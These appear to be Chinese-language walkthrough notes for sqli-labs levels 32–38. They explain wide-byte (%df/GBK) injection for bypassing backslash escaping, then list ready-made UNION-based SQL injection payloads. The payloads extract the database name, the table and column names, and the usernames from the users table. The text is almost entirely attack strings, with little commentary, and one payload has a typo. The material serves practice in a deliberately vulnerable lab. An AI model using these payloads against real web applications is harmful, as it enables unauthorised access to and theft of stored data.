32.
看到“前面有了\这里使用宽字节注入
当字符的大小为一个字节时为窄字节
当字符的大小为两个字节时为宽字节
英文字符的大小为一个字节,汉字为两个
漏洞产生的成因在sql中使用像GB2312,GBK,GB18030,BIG5,Shift_JIS这些宽字节编码而php使用utf-8编码
为了防止注入对于'和"通过\进行转意
我们只要将\和前面的字符结合起来使sql中的宽字符编码把两个字节一起解析为汉字而php中还是以一个字节编码
这里常使用%df %df与/组成了一个汉字綅
0%df'union select 1,2,3 --+
0%df'union select 1,database(),3 --+
0%df'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
这里security换成databse()不然这里也会被转义
0%df'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),3--+
0%df'union select 1,(select group_concat(username) from security.users),3 --+
33.
0%df'union select 1,2,3 --+
0%df'union select 1,database(),3 --+
0%df'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
0%df'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),3 --+
0%df'union select 1,(select group_concat(username) from security.users),3 --+
34.
用户名输入Dhakkan 密码输入1‘union select 1,2,3#宽字节注入
%df'union select 1,2 #
在浏览器中输入%df中的%经过url编码为%25所以在bp上改
%df'union select 1,database() #
%df'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()) #
%df'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273) #
%df'union select 1,(select group_concat(username) from security.users) #
35.
输入1‘ 1“ 1’--+ 1”--+都报错得到是数字型注入
-1 union select 1,2,3 --+
-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),3 --+
-1 union select 1,(select group_concat(username) from security.users),3 --+
36.
-1%df'union select 1,2,3 --+
-1%df'union select 1,database(),3 --+
-1%df'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
-1%df'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),3 --+
-1%df'union select 1,(select group_concat(username) from security.users),3 --+
37.
1%df'union selecet 1,2 #
1%df'union select 1,database() #
1%df'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())#
1%df'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273)#
1%df'union select 1,(select group_concat(username) from security.users)#
38.
-1'union select 1,database(),3 --+
-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
-1'union select 1,(select group_concat(username) from security.users),3 --+